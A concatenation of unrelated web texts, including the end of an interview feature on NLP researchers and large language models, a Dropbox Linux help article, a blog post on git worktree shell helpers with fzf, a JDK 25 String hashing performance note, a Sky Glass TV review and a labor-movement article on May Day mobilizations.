Ungrounded hype isn’t helpful in science. I felt it was important to study the fundamental limits and capabilities of LLMs more rigorously, and that was my primary research focus in 2024. I found myself in a weird situation where I was becoming the negative naysayer for how the models cannot do this and that. Which I think is important — but I didn’t want it to be all that I do. So I’m actually thinking a lot about
different problems
these days.
TAL LINZEN:
It’s sometimes confusing when we pretend that there’s a scientific conversation happening, but some of the people in the conversation have a stake in a company that’s potentially worth $50 billion.
The explosion of research momentum, money and hype vaporized the already-porous boundaries between NLP and AI. Researchers contended with a new set of incentives and opportunities — not just for themselves, but for the field itself.
NAZNEEN RAJANI:
It opened doors that wouldn’t have otherwise. I was one of the first people to get the data to reproduce ChatGPT in open-source — I basically wrote the recipe book for it, which is amazing. And that led me to get a good seed round for my startup.
R. THOMAS MCCOY:
Any faculty member who is AI-adjacent starts to be viewed as an AI person — you sort of get typecast to play that role. I’m happy to work on AI because it’s one of the most impactful things that I can be doing with my skillset. But the thing that would bring me the greatest joy is diving deeply into interesting corners of grammar and human cognition. Which is something that can be linked back to advancing AI, but that pathway is pretty long.
JULIE KALLINI:
It’s all a matter of semantics, right? Personally, I see myself as working across NLP, computational linguistics and AI at the same time. I do think there are different communities for each field, but there are plenty of people who bridge several areas.
JULIAN MICHAEL:
If NLP doesn’t adapt, it’ll become irrelevant. And I think to some extent that’s happened. That’s hard for me to say. I’m an AI alignment researcher now.
ANNA ROGERS:
I’m not concerned. Basically that’s because I don’t think we’ve actually solved the problem. The only reason to get upset is if you think: “This is it. Language is done.” And I don’t think that’s true.
CHRISTOPHER POTTS:
This should be an incredible moment for linguistics and NLP. I mean, the stakes are very high. Maybe it’s one of those moments of a field waking up and realizing that it now has incredible influence. You can’t pretend like you’re a quiet scientific or engineering field anymore that just does research for the sake of research — because now all the money in the world is behind you, and every big corporation is trying to exert influence on what you do, and language models are being deployed all over the place.
If you achieve so much, you also have to accept that the debates are going to be heated. How else could it be?
* * *
Epilogue: Were Large Language Models a Paradigm Shift?
Not surprisingly, opinions differ.
TAL LINZEN:
If you asked me five, seven, 10 years ago, I would never have thought that just typing an instruction into a language model would get it to complete the sentence in a way that is consistent with what you’re asking it to do. I don’t think anyone would have thought that that would be the paradigm these days. We have this one interface that basically lets us do everything.
ANNA ROGERS:
As a linguist, I wouldn’t say so. Back from the word-embedding days [in 2013], the whole premise was transfer learning — you learn something from a large amount of textual data in the hope that this will help you with something else. There have been shifts in popularity, in architectures, in how the public feels about this — but not in this underlying principle.
JEFF MITCHELL:
I feel like the corporate interests have changed the way the game is played.
ELLIE PAVLICK:
I think the media involvement makes a difference. Scientists in my field realized that success could look like becoming known outside of NLP, and suddenly the audience changed. Papers on arxiv.org are often titled to be picked up by journalists or Silicon Valley enthusiasts, not by professors. That’s a huge change.
VUKOSI MARIVATE:
I think in some ways the barrier to entry both got reduced and heightened. The reduced part is that there’s still a lot that we just don’t understand about what’s actually going on in these systems, so there’s a lot of work that’s just prodding them as much as possible. In that case, you don’t need to know the architecture of a neural network like the back of your hand.
At the same time, the barrier was heightened because in order to play with and prod those architectures, you have to be in a very high-resource space, computationally speaking.
EMILY M. BENDER:
I have seen an enormous shift towards end-to-end solutions using chatbots or related synthetic text-extruding machines. And I believe it to be a dead end.
CHRISTIANE FELLBAUM:
The big shift, or shock I would even say, is that these large language models are getting so powerful that we have to ask, “Where does the human fit in?’’ That’s a paradigm shift: a shift in technology, how these models are trained and how well they can learn. And then of course the educational consequences, like in my class. Those are the things that keep me awake at night.
R. THOMAS MCCOY:
In linguistics, there are all these questions that historically have been largely philosophical debates that suddenly are empirically testable. That’s definitely been one big paradigm shift. But from a certain point of view, the way the field looked like 10 years ago was: people creating some data set, throwing a neural network at the data set, and seeing what happened. And that version of the field still exists, just with much larger data sets and much larger neural networks.
CHRISTOPHER POTTS:
Maybe this is the way it always works, but the hallmark of a paradigm shift is that questions we used to think were important now no longer get asked. It feels like that has happened over the past five years. I used to focus a lot on sentiment classification, like, “Give me a sentence and I’ll tell you if it was expressing a positive or negative emotion.’’ Now the entire field is focused on natural language generation — all those questions that we used to think were central have become peripheral compared to that.
I suppose these are famous last words. Maybe in 2030, we’ll look back and think this was nothing compared to what happened in 2029.
All conversations have been edited for length and clarity.
Dropbox will require App Indicator support on Linux
The information in this article applies to Dropbox customers on the Linux operating system.
Important note
: The Dropbox desktop app for Linux is changing. To continue enjoying the full desktop experience on Linux, you may need to update your system or download additional libraries.
With the Dropbox desktop app for Linux, you can save, view, share, and access files and folders stored in your Dropbox account from your computer.
To get the full Dropbox desktop experience on Linux, including the Dropbox icon in the system tray, you’ll need to meet additional requirements and you may need to install additional libraries.
Supported Linux distributions
To get the full desktop app experience on Linux, you’ll need one of the following:
Ubuntu 64-bit
: 18.04 or later
Fedora 64-bit
: 28 or later
Note
: The Dropbox desktop app isn’t officially supported on other Linux distributions, but it may work if they meet the necessary Dropbox system requirements for Linux.
Supported desktop environments
The Dropbox tray icon needs a desktop environment that supports AppIndicator, which desktop apps use to display icons in the system tray. Not all desktop environments support AppIndicator natively.
To determine your desktop environment:
Open your Terminal application.
Copy and paste the following command into Terminal, then press
Enter
:
echo $XDG_CURRENT_DESKTOP
The terminal will display the name of your current desktop environment.
The following desktop environments generally support AppIndicator:
Unity
KDE Plasma
The following desktop environments need additional libraries or extensions to support AppIndicator:
XFCE
supports AppIndicators via xfce4-indicator-plugin, which may be preinstalled in your distribution.
MATE
has native indicator support, especially in Ubuntu MATE. For Linux Mint (MATE), you’ll need to install the Ayatana Indicators.
Notes
:
Other desktop environments like LXDE don’t support AppIndicator natively or through extensions, and can’t be supported. You’ll need a different desktop environment to get the full Dropbox desktop app experience.
Linux distributions can vary.
To install Ayatana Indicators for Linux Mint (MATE)
To install Ayatana Indicators:
Open your Terminal application.
Copy and paste the following command into Terminal, then press
Enter
:
sudo apt install ayatana-indicator-application
Restart your machine.
Right-click on the MATE panel, then click
Add to Panel
.
Enter
Indicator Applet Complete
in the box beside
Find an item to add to the panel
.
Select
Indicator Applet Complete
when it appears, then click
Add
.
The Dropbox icon should now appear in the added applet.
Required software libraries
You’ll also need all of the following software libraries to run the app:
GTK
2.24 or later
Glib
2.40 or later
Libappindicator
12.10 or later
To install LibAppIndicator on Linux
Dropbox uses an external library called LibAppIndicator to interact with AppIndicator. For the full Dropbox experience, you’ll need to install this library:
Fedora
Open your Terminal application.
Copy and paste the following command into Terminal, then press
Enter
:
sudo dnf install libappindicator-gtk3
Debian or Ubuntu
Open your Terminal application.
Copy and paste the following command into Terminal, then press
Enter
:
sudo apt install libappindicator3-1
FAQs
Why has my Dropbox app for Linux stopped working?
The Dropbox app for Linux was recently updated. As a result, some Linux users need to meet additional requirements or download additional libraries to continue using the app in the same way as before. If you’re having issues, check you’re running the latest version of the app, review the requirements in this article, then update your computer if necessary.
Can I run the Dropbox app for Linux if I don’t meet all of the requirements?
If your device doesn’t meet the operating system requirements, you may still be able to use the Dropbox desktop application, but results may vary.
The Dropbox app can also run in headless mode, once you meet the
essential system requirements
. This runs without a graphical user interface. You can
install the app
, then control Dropbox using the Linux Command Line Interface (CLI).
What Linux commands are available on Dropbox?
The Dropbox desktop app can be controlled with the Linux Command Line Interface (CLI). Before running commands, ensure that you’re running the available commands while your prompt is located at the root (top level) of the Dropbox folder.
Learn more about available Linux commands on Dropbox
.
Was this article helpful?
Thanks for your feedback!
Related Articles
Access all your Paper docs on the go with the Dropbox Paper app for iOS and Android. Learn how to get the most from Dropbox Paper on a mobile device.
You can access your Dropbox account on your phone or tablet in two ways: the Dropbox mobile app or via dropbox.com in your browser. Learn more.
The Dropbox desktop app is available for Windows, macOS, and Linux operating systems. Learn how to get Dropbox and install the app with ease.
Check the minimum system requirements to run Dropbox Capture on your Windows or Mac device, and review browser support for capture.dropbox.com.
Git worktrees are great, but they fall behind the venerable
git checkout
sometimes. I attempted to fix that with
fzf
and a bit of bash.
Fear not if you haven’t heard of “worktrees”, I have included a
primer here.
Skip the primer ->
.
Why Worktrees?
Picture this. You are whacking away on a feature branch. Halfway
there, in fact. Your friend asks you fix something urgently. You proceed
to do one of three things:
create a temporary branch, make a WIP commit, begin working on the
fix
stash away your changes, begin working on the fix
unfriend said friend for disturbing your flow
All of these options are … subpar. With the temporary branch, you are
forced to create a partial, non-working commit, and then reset said
commit once done with the fix. With the stash approach, you are required
to now keep a mental model of the stash, be aware of untracked files
that don’t get stashed by default, etc. Why won’t git just let you work
on two things at the same time without
thinking
so much?
That is exactly what worktrees let you do. Worktrees let you have
more than one checkout at a time, each checkout in a separate directory.
Like creating a new clone, but safer (it disallows checking out the same
branch twice) and a lot more space efficient (the new working tree is
“linked” to the “main” worktree, and a good amount of stuff is shared).
When your friend asks you to make the fix, you proceed like so:
Easy as cake. You didn’t have to settle for a partially working
commit, you didn’t to deal with this “stash” thing,
and
you
didn’t have to unfriend your friend. Treating each branch as a directory
just
feels
more intuitive, more UNIX-y.
A few weeks later, you find yourself singing in praise of worktrees,
working on several things simultaneously. And at the same time, cursing
them for being a little … clunky.
What makes them clunky?
Worktrees are great at what they claim to do. They stay out of the
way when you need a checkout posthaste. However, as you start using them
regularly, you realize they are not as flexible as
git checkout
or
git switch
.
Branch-hopping
You can
git checkout <branch>
from anywhere within
a git repository. You can’t “jump” to a worktree in the same fashion.
The closest you can get, is to run
git worktree list
, copy
the path corresponding to your branch, and
cd
into it.
# keeping these paths in your head is hardλ git worktree list~/worktrees/rustc/master eac6c33bc63 [master]~/worktrees/rustc/improve-std-char-docs 94cba88553e [improve-std-char-docs]~/worktrees/rustc/is-ascii-octdigit bc57be3af7a [feature/is-ascii-octdigit]~/my/other/path/oh/god op57or3ns7n [fix/some-error]λ cd ~/worktrees/rustc/is-ascii-octdigit
Branch-previewing
You can “preview” branches with
git branch -v
. However,
to get an idea of what “recent activity” on a worktree looks like, you
might need some juggling. You can’t glean much info about a worktree in
a jiffy.
Branch-previewing with the good ol’ git-branch:
λ git branch -v+ feature/is-ascii-octdigit bc57be3af7a introduce {char, u8}::is_ ...+ improve-std-char-docs 94cba88553e add whitespace in assert ...* master eac6c33bc63 Auto merge of #100869 - n ...
Meanwhile in worktree wonderland:
λ git worktree list
~/worktrees/rustc/master eac6c33bc63 [master]
~/worktrees/rustc/improve-std-char-docs 94cba88553e [improve-std-char-docs]
~/worktrees/rustc/is-ascii-octdigit bc57be3af7a [feature/is-ascii-octdigit]
# aha, so ../is-ascii-octdigit corresponds to `feature/is-ascii-octdigit`
λ git log feature/is-ascii-octdigit
bc57be3af7a introduce {char, u8}::is_ascii_octdigit
eac6c33bc63 Auto merge of #100869 - nnethercote:repl ...
b32223fec10 Auto merge of #100707 - dzvon:fix-typo, ...
aa857eb953e Auto merge of #100537 - petrochenkov:pic ...
# extra work to make the branch <-> worktree correspondence
Shell completions
Lastly, you can bank on shell completions to fill in your branch
whilst using
git checkout
. Worktrees have no such
conveniences.
We can mend these minor faults with fzf.
Unclunkifying worktrees
I’d suggest looking up
fzf
(or
skim
or
fzy
). These things make it
cake-easy to add interactivity to your shell. Onto fixing the first
minor fault, the inability to “jump” to a worktree from anywhere within
a git repository.
I have a little function called
gwj
which stands for
“git worktree jump”. The idea is to list all the worktrees, select one
with fzf, and
cd
to it upon selection:
gwj (){localoutout=$(git worktree list |fzf|awk'{print $1}')cd$out}
That is all of it really. Head into a git repository:
# here, "master" is a directory, which contains my main# worktree: a checkout of the master branch on rust-lang/rust λ cd ~/worktrees/rustc/master/library/core/srcλ# hack away
And hit enter. You should find yourself in the selected worktree.
Onward, to the next fault, lack of preview-bility. We can utilize
fzf’s aptly named
--preview
flag, to, well, preview our
worktree before performing a selection:
gwj (){localoutout=$(git worktree list |fzf--preview='git log --oneline -n10 {2}'|awk'{print $1}')cd$out}
Once again, hit
gwj
inside a git repository with linked
worktrees:
λ gwj╭─────────────────────────────────────────────────────────╮│ eac6c33bc63 Auto merge of 100869 nnethercote:replace... ││ b32223fec10 Auto merge of 100707 dzvon:fix-typo, r=d... ││ aa857eb953e Auto merge of 100537 petrochenkov:picche... ││ 3892b7074da Auto merge of 100210 mystor:proc_macro_d... ││ db00199d999 Auto merge of 101249 matthiaskrgr:rollup... ││ 14d216d33ba Rollup merge of 101240 JohnTitor:JohnTit... ││ 3da66f03531 Rollup merge of 101236 thomcc:winfs-noze... ││ 0620f6e90af Rollup merge of 101230 davidtwco:transla... ││ c30c42ee299 Rollup merge of 101229 mgeisler:link-try... ││ e5356712b9e Rollup merge of 101165 ldm0:drain_to_ite... │╰─────────────────────────────────────────────────────────╯>4/4> /home/np/worktrees/compiler/master eac6c.../home/np/worktrees/compiler/improve-std-char-docs 94cba.../home/np/worktrees/compiler/is-ascii-octdigit bc57b...
A fancy preview of the last 10 commits on the branch that the
selected worktree corresponds to. In other words, sight for sore eyes.
Our little script is already shaping up to be useful, you hit
gwj
, browse through your worktrees, preview each one and
automatically
cd
to your selection. But we are not done
yet.
The last fault was lack shell completions. A quick review of what a
shell completion really does:
Each time you hit “tab”, the shell produces a few “completion
candidates”, and once you have just a single candidate left, the shell
inserts that for you directly into your edit line. Of course, this
process varies from shell to shell.
fzf narrows down your options as you type into the prompt, but you
still have to:
Type
gwj
Hit enter
Type out a query and narrow down your search
Hit enter
We can speed that up a bit, have fzf narrow down the candidates on
startup, just like our shell does:
gwj (){localoutqueryquery="${1:-}"out=$(git worktree list |fzf--preview='git log --oneline -n10 {2}'--query"$query"-1|awk'{print $1}')cd$out}
The change is extremely tiny, blink-and-you’ll-miss-it kinda tiny. We
added a little
--query
flag, that allows you to prefill the
prompt, and the
-1
flag, that avoids the interactive finder
if only one match exists on startup:
# skip through the fzf prompt:λ gwj master# cd -- ~/worktrees/rustc/master# more than one option, we end up in the interactive finderλ gwj improve╭─────────────────────────────────────────────────────────╮│ eac6c33bc63 Auto merge of 100869 nnethercote:replace... ││ b32223fec10 Auto merge of 100707 dzvon:fix-typo, r=d... ││ aa857eb953e Auto merge of 100537 petrochenkov:picche... │╰─────────────────────────────────────────────────────────╯> improve2/2> /home/np/worktrees/compiler/improve-const-perf eac6c.../home/np/worktrees/compiler/improve-std-char-docs 94cba...
Throw some error handling in there, hook up a similar script to
improve the UX of
git worktree remove
, go wild. A few more
helpers I’ve got:
# gwa /path/to/branch-name# creates a new branch and "switches" to itfunction gwa (){git worktree add "$1"&&cd"$1"}alias gwls="git worktree list"
In JDK 25,
we improved
the performance of the class
String
in such a way that the
String::hashCode
function is mostly
constant foldable
. For example, if you use Strings as keys in a static unmodifiable
Map
, you will likely see significant performance improvements.
Example
Here is a relatively advanced example where we maintain an immutable
Map
of native calls, its keys are the name of the method call and the values are a
MethodHandle
that can be used to invoke the associated system call:
// Set up an immutable Map of system callsstaticfinalMap<String,MethodHandle>SYSTEM_CALLS=Map.of(“malloc”,linker.downcallHandle(mallocSymbol,…),“free”,linker.downcallHandle(freeSymbol…),...);…// Allocate a memory region of 16 byteslongaddress=SYSTEM_CALLS.get(“malloc”).invokeExact(16L);…// Free the memory regionSYSTEM_CALLS.get(“free”).invokeExact(address);
The method
linker.downcallHandle(…)
takes a symbol and additional parameters to bind a native call to a Java
MethodHandle
via the
Foreign Function & Memory API
introduced in JDK 22. This is a relatively slow process and involves spinning bytecode. However, once entered into the
Map
, the new performance improvements in the
String
class alone allow constant folding of both the key lookups and the values, thus improving performance by a factor of more than 8x:
Note
: the benchmarks above are not using a
malloc()
MethodHandle
but an
int
identity function
. After all, we are not testing the performance of
malloc()
but the actual
String
lookup and
MethodHandle
performance.
This improvement will benefit any immutable
Map<String, V>
with Strings as keys and where values (of arbitrary type
V
) are looked up via constant Strings.
How Does It Work?
When a
String
is first created, its hashcode is unknown. On the first call to
String::hashCode
, the actual hashcode is computed and stored in a private field
String.hash
. This transformation might sound odd; if
String
is
immutable
, how can it mutate its state? The answer is that the mutation cannot be observed from the outside;
String
would functionally behave the same regardless of whether or not an internal
String.hash
cache field is used. The only difference is that it becomes faster for subsequent calls.
Now that we know how
String::hashCode
works, we can unveil the performance changes made (which consists of a single line of code): the internal field
String.hash
is marked with the JDK-internal
@Stable
annotation. That’s it!
@Stable
tells the virtual machine it can read the field once and, if it is no longer its default value (zero), it can trust the field never change again. Hence, it can
constant-fold
the
String::hashcode
operation and replace the call with the known
hash
. As it turns out, the fields in the immutable
Map
and the internals of the
MethodHandle
are also trusted in the same way. This means the virtual machine can constant-fold the entire chain of operations:
Computing the hash code of the String “malloc” (which is always
-1081483544
)
Probing the immutable
Map
(i.e., compute the internal array index which is always the same for the
malloc
hashcode)
Retrieving the associated
MethodHandle
(which always resides on said computed index)
Resolving the actual native call (which is always the native
malloc()
call)
In effect, this means the native
malloc()
method call can be invoked directly, which explains the tremendous performance improvements. To put it in other words, the chain of operation is completely short-circuited.
What Are the Ifs and Buts?
There is an unfortunate corner case that the new improvement does not cover: if the hash code of the
String
happens to be zero, constant folding will not work. As we learned above, constant folding can only take place for non-default values (i.e., non-zero values for
int
fields). However, we anticipate we will be able to fix this small impediment in the near future. You might think only one in about 4 billion distinct Strings has a hash code of zero and that might be right in the average case. However, one of the most common strings (the empty string “”) has a hash value of zero. On the other hand, no string with 1 - 6 characters (inclusive) (all characters ranging from ` ` (space) to
Z
) has a hash code that is zero.
A Final Note
As
@Stable
annotation is applicable only to internal JDK code, you cannot use it directly in your Java applications. However, we are working on a new JEP called
JEP 502: Stable Values (Preview)
that will provide constructs that allow user code to indirectly benefit from
@Stable
fields in a similar way.
What’s the Next Step?
You can
download JDK 25
already today and see how much this performance improvement will benefit your current applications,
Sky Glass gen 2 review: the smart streaming TV levels up
Guardian
www.theguardian.com
2025-05-01 07:00:16
Latest satellite-free Sky TV is ready for primetime with better picture, sound and much-improved service The latest version of Sky’s Glass smart TV is faster and looks better than its predecessor and offers a level of all-in-one convenience that makes the satellite-free pay TV one of the best on the...
T
he latest version of Sky’s Glass smart TV is faster and looks better than its predecessor and offers a level of all-in-one convenience that makes the satellite-free pay TV one of the best on the market.
Sky Glass gen 2 is a straight replacement for the
original model from 2021
, which introduced Sky’s TV-over-broadband service that ditched the need for a satellite dish. The new TV comes in three sizes and you can buy the smallest 43in version for a one-off payment of £699 or £14 a month spread over four years, after which you own it.
It requires a Sky subscription for full use, costing from £15 a month for the Sky Essential TV pack. You wouldn’t buy a Glass without the intention of using Sky, but should you want to ditch the subscription at a later date it will
function as a basic smart TV
with access to streaming apps such as BBC iPlayer, plus
a basic aerial
and multiple HDMI inputs.
The gen 2 is available in a choice of three colours and comes with a colour-matched remote.
Photograph: Sky UK
From the front, the gen 2 model looks very similar to the original. It has the same monolithic design with an aluminium body, slim bezels, a soundbar hidden behind a colour-matched mesh at the bottom and voice control mics that respond to “Hello Sky”. Glass gen 2 is thinner and lighter than the outgoing model, though still heavy for a modern TV, weighing 14.7kg for the 43in version with the stand. The larger and heavier 55in and 65in models will require two people to safely manoeuvre them.
A redesigned stand makes it a lot easier to set up, even at the 65in size as tested, with the TV simply slotting on to two prongs for a very stable mount without screws or tools required. It needs a power cable and wifi or Ethernet for internet. A wall bracket can be bought separately.
The TV is voice- and motion-activated, turning on and off when it detects presence, and displaying full-screen recommendations for the latest shows and films.
Photograph: Samuel Gibbs/The Guardian
The crisp 4K LCD screen is noticeably brighter than its predecessor, with deeper blacks and much-reduced halo or blooming effect, which is the unwanted glow around the edges of bright spots such as white text on a black background. The screen has automatic brightness adjustment, which made things look a little too dark and grey in all but the brightest of rooms. Turning it off improved things.
Sky has automatic picture optimisation modes that detect the content being watched, such as entertainment, sport and movies, plus manual vivid and extra vivid modes for those who like over-the-top colours. I found the entertainment mode made the picture too warm, with people looking a little orange, while sport was a bit grey for all but the brightest of match days.
I preferred the movie setting, which is much more balanced, but there is also a custom mode for those who want to fully personalise the picture.
The improved screen really comes to life with HDR films, shows and sport. The Premier League looks crisp and vibrant on Sky and TNT, while flicks such as
Furiosa: A Mad Max Saga
in Dolby Vision look particularly good. But the screen is not ideal for gaming with an Xbox or PS5, lacking the variable refresh rates of up to 120Hz that console gaming greatly benefits from.
Big sound and great vocals
The speakers fire out from the grille at the top of the TV and fabric strip below the screen.
Photograph: Samuel Gibbs/The Guardian
A big advantage of the Glass over normal TVs is the integrated seven-speaker soundbar, which blows other TV speakers away for power and clarity. Vocals are particularly clear at almost any volume and with none of the
lip-sync issues
that can plague external soundbars. Without a separate subwoofer or rear speakers, it does an admirable job of producing big and full sound.
However, it struggles to produce really deep, booming bass, and while it has a nice wide sound, there isn’t much in the way of virtual surround effect. Both require a more complex system to achieve with more speakers.
The TV also has night sound, speech enhancement and bass boost modes, the first of which proved very useful to avoid waking the rest of the house for late-night movies, by dampening loud noises while keeping the dialogue intelligible.
Much-improved Sky over broadband
You need a minimum of 25Mbps for HD or 30Mbps for UHD broadcast, but don’t have to have Sky’s broadband for it to work.
Photograph: Samuel Gibbs/The Guardian
Since the original Glass’s launch in 2021, the Sky OS service powering it has dramatically improved. It still has excellent search and an improved playlist function, with more than one user profile so everyone in the house can have their own lists and recommendations, including child profiles.
The playlist feature automatically keeps track of new episodes of shows and films you want to watch, regardless of which service they’re available from. It feeds into a recently added “continue watching” rail that helps you jump straight back into the content you were previously watching, which is all I needed about 75% of the time.
Watching, pausing and rewinding live TV works great. Recent
reductions to the broadcast delay
for sports have made a meaningful difference, preventing the irritating scenario where a friend watching on satellite or aerial a little ahead of you texts to brag about a goal before you’ve managed to actually see it.
On-demand content from the Sky platform works really well, but a bigger improvement is in the third-party on-demand services such as BBC iPlayer, ITV X and Channel 4, on which you are reliant in place of recordings. It’s still not quite as fast and seamless as having local recordings, such as you might on Sky Q or other PVR, but most of the apps launch quicker, work better and will take you straight to the episode you want to watch from the playlist or search page.
It supports most of the major on-demand services, including My5, YouTube, Prime Video, Disney+, Paramount+, Apple TV+ and Discovery+, for all your content in one place.
Voice control works well through the button on the remote, but the TV’s wake word is a little temperamental, working properly or understanding me about 60% of the time.
Photograph: Samuel Gibbs/The Guardian
Sustainability
The television is
repairable apart from the screen
. It contains 22% recycled material, including aluminium, fabric, tin and plastic. The company will recycle its old products and ships the TV in plastic-free packaging.
Price
Sky Glass gen 2 costs
£699
at 43in, £949 at 55in or £1,199 at 65in, with 24- or 48-month interest-free payment plans available for all models with a £20 upfront cost.
On 24-month contracts, Sky Essential TV costs from £15 a month, Sky Ultimate TV from £22 a month, and UHD + Dolby Atmos costs an additional £6, as does the ability to skip ads. Other add-ons include Sky Sports from £31 a month, TNT Sport from £31 a month, Sky Cinema from £13 a month and Sky Kids at £8 a month. Some discounts are available for certain combinations, while all the packages can be bought on a 31-day basis at different prices.
Verdict
The first-generation Glass required work when it launched, to the television screen and the Sky streaming service powering it. The gen 2 model rights many of the wrongs of its predecessor.
It is brighter, faster, has higher contrast and handles highlights far better. It is also easily the best-sounding TV available. It competes fairly well in the mid-range market but you can certainly buy a better-looking screen for similar money without a soundbar; those looking for the absolute best picture should look elsewhere.
The Sky OS service has greatly improved to a level that rivals the best in the business. Live broadcast works just as it might over satellite or aerial. On-demand content from the Sky platform is as good as local recordings while the third-party apps such as BBC iPlayer and ITVX have levelled up to at least an acceptable standard. The playlist and search with support for all the major streaming services are the killer features, removing the burden of remembering which of the plethora of services hosts the content you want to watch.
Above all, it is the level of convenience offered by the Glass gen 2, of an all-in one solution with solid sound and a single remote for all your TV needs, that is the major appeal.
Pros:
all-in-one streaming and pay TV device, great sound, no satellite/cable or aerial needed, good remote, excellent search and playlist functions, improved apps, improved picture and good HDR, custom picture modes, optional motion-sensing and voice control.
Cons:
better picture available for less from competitors, some picture modes and automatic brightness control aren’t great, no fast refresh rate for game consoles, thick and heavy, no Chromecast support, some third-party catchup/on-demand services still aren’t great.
The power and a mic mute button are in the right side of the TV.
Photograph: Samuel Gibbs/The Guardian
The Secret Services' involvement in the making of The Line of Fire (1993) [pdf]
Where are the pitchforks? President Donald Trump’s administration has declared open season on the working class. Its henchmen have
unleashed
kidnappings by state agents, worksite raids that spread terror and stifle workplace militancy, massive federal layoffs, funding cuts with devastating consequences and attacks on diversity, equity and inclusion, as well as efforts to
eliminate collective bargaining rights
wholesale. The array of assaults may appear dizzying, but that’s by design: Confusion, division, fear and hopelessness are classic boss tactics, intended to silence dissent and chill organizing. We’re now seeing them on a national scale, as Trump and his cronies work to consolidate power while handing out tax cuts for billionaire pals and giving corporations carte blanche to fleece the public and the services they depend on (including access to medical care). The end game is oligarchy.
Amid the fear and uncertainty, the organized working class, comprising 14 million union members, has largely been quiet or focused on their individual fights. But the scope and horror of attacks on workers have jolted unions to consider new tactics and forge new alliances.
A
May Day Strong
coalition of over 200 organizations, including major national labor unions and hundreds of community organizations, is planning 1,273 mass mobilizations, from strikes to sit-downs to rallies, across 1,031 cities and towns nationwide on International Workers Day, May 1. Among the anchoring organizations are the Chicago Teachers Union (which first brought groups together), National Education Association, American Federation of Teachers, Communication Workers of America, Association of Flight Attendants-CWA and United Electrical Workers, as well as the Sunrise Movement, the Center for Popular Democracy, Indivisible, and a panoply of other issue-based organizations, from Palestine organizing to reproductive justice to immigrant rights.
Participants will raise the unifying banner “For the Workers, Not the Billionaires,” a nod to the populist message of Occupy Wall Street in 2011, when thousands of people turned out to denounce bankers for the taxpayer-funded bailout.
“For many of the organizations involved with May Day mobilizations, this is the first time we are working outside of our union sector or region, and alongside federal government and private sector locals, with the participation of national community networks and their local affiliates,”
wrote
Jackson Potter, vice president of the Chicago Teachers Union, in
Convergence
magazine. CTU is one of the main conveners of the May Day Strong Coalition. The national day of action, Potter continued, “ us new partners to map geographies that have burgeoning union organizing campaigns, nodes of production where workers have disproportionate power, and community forces willing to throw down to defend our democratic rights and institutions.”
In some instances, unions are linking preexisting struggles against billionaire employers, whether university systems, hospitals or the superrich, and tying them to the broader class-wide assaults Trump has turbocharged in his 101 days in office. In others, community organizations and unions are testing out new alliances to bridge specific campaigns to a broader class-struggle orientation that positions working-class people as the countervailing power to billionaire rule. Will this be a dress rehearsal for possible general strike in May 2028? It’s all premature to say in these
whirlwind times
. But one thing is for sure: Working people will be flexing their collective muscles in a range of arenas in class struggle, from saving Medicaid to standing up for federal workers, nurses, immigrants and any human being whose rights are being trampled on by Trump and his minions. May Day will be a national demonstration that will polarize today’s struggle not along resentful, racist lines of immigrant vs. “native,” but along the class-struggle lines of workers vs. billionaires.
In Chicago, the site of the 1886 Haymarket affair that sparked the May Day holiday, the organizing got started with an in-person convening in March, followed by online meetings that drew thousands of participants. The CTU, Arise Chicago and dozens of other labor unions and community organizations will lead a march at 11a.m. from Unity Park to Grant Park. The action not only honors the pitched battle for an eight-hour day in 1886, but also the 400,000-person march on May 1, 2006 to defeat a measure criminalizing undocumented immigrants. A loose coalition of immigrant rights organizations in Chicago is organizing one-day strikes, distributing letters through social media and other channels reminding workers of their right to withhold their labor to protest unfair labor practices at their workplaces.
Minnesota will have a
full day of actions
, including a rally of airport workers at 12 p.m. to stand up to Trump and Musk as well as to corporations like Delta, Uber, Lyft and the Metropolitan Airports Commission. Anchoring organizations include local immigrant rights groups and SEIU Local 26, UNITE HERE Local 17, the Flight Attendants, the Machinists, Teamsters Local 120, and AFGE. Later at 5 p.m., a unity rally at the state Capitol is expected to draw tens of thousands, and will include liberal anti-Trump groups like Indivisible.
In Philadelphia, Sen. Bernie Sanders (I-Vt.) will headline a hundreds-strong rally at City Hall with local labor and immigration-rights leaders. In New Orleans, hundreds of registered nurses at University Medical Center will go on strike as they
negotiate
for a first contract.
California will see some of the largest actions. Twenty thousand healthcare, research and technical workers across the University of California system have timed their unfair labor practice strike for May 1. Their union, UPTE of Communications Workers Local 9119, is striking because UC
announced
a systemwide hiring freeze on March 19, 2025, using Trump’s threatened cuts as cover, without giving the union notice or an opportunity to bargain.
UPTE President Dan Russell, who was elected as part of a reform slate in 2021, says the University of California is “using the political climate as an excuse for the behavior that they had already been exhibiting … which is refusing to bargain in good faith to address the staffing crisis, and just continuing to commit, you know, one unfair labor practice after another.”
AFSCME Local 3299, representing more than 37,000 patient care workers across the same UC system, also plans a
walk-out
on May Day over similar illegal hiring freeze allegations. “The University of California sits on $10 billion in unrestricted reserves,” says Todd Stenhouse, spokesperson for AFSCME 3299. “It has routinely handed out raises of 30-40% to its growing legion of Ivory Tower elites, chancellors and the like. It provides them low-interest home loans. They can use them to buy second homes. And all the while the front liners, the people that answer the call button, people that are sweeping the floors, people that are serving the food right, are struggling like never before to make ends meet.
“International Workers Day is a time for workers to celebrate the ongoing struggle, but it is also a time to reclaim our voice in a very uncertain time against employers who, frankly, don’t know what it means to walk in our shoes.”
At noon, the expected 60,000 will swell in number as other unions join in solidarity rallies across California, including the United Auto Workers 4811, UC-AFT 1474, Teamsters Local 2010, and the California Nurses Association. There’s also a planned teach-in at 1:30 p.m.
In Georgia, the Union of Southern Service Workers is planning a march on Atlanta City Hall alongside partnering organizations, including the Coalition of Black Trade Unionists, Atlanta Jobs with Justice, United Campus Workers, Georgia Latino Alliance for Human Rights and the Indivisible Project. Planned stops include an immigrant detention center and a local OSHA office.
Katie Giede, an 11-year server at Waffle House and member of the Union of Southern Service Workers, said she would be marching to take on billionaires like Waffle House boss Joe Rogers III. Last year, she and her co-workers
pressured
their employer to raise wages from $2.92 to $5.25 hourly in two years across most markets.
Reprinted with permission from
In These Times
. All rights reserved.
Portside is proud to feature content from
In These Times
, a publication dedicated to covering progressive politics, labor and activism. To get more news and provocative analysis from
In These Times
,
sign up
for a free weekly e-newsletter or
subscribe
to the magazine at a special low rate.
Reader donations, many as small as just $1, have kept
In These Times
publishing for 45 years. Once you've finished reading, please consider making a
tax-deductible donation
to support this work.
UNRWA Chief Accuses Israel of Torturing Staff as US Backs Ban on Agency at World Court
Portside
portside.org
2025-05-01 06:38:59
UNRWA Chief Accuses Israel of Torturing Staff as US Backs Ban on Agency at World Court
